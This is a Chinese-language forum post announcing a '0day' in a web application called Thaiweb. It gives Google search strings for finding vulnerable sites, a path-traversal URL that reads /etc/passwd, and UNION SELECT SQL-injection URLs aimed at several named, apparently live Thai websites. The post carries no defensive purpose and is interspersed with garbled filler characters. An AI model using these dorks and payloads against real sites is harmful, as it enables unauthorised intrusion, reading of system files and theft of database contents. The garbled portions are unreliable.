Thaiweb远程文件sql注入漏洞0day

admin

Google之:

intext:powered by Thaiweb
0 t5 a1 c. z, l6 W
inurl:index.php?page=board.php



" f6 k) X! X: k1 A利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd

) v6 I8 T+ {0 |- B+ E" \

利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4'
6 ]+ N5 }5 z+ i8 L2 \6 {$ B
4 ~8 H" B: X: m: R6 g4 H. b
8 ^  V7 c1 ~" l
http://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--

http://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
2 j. |  N5 s1 c; A* u+ N
http://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
) Q& G1 M8 U* c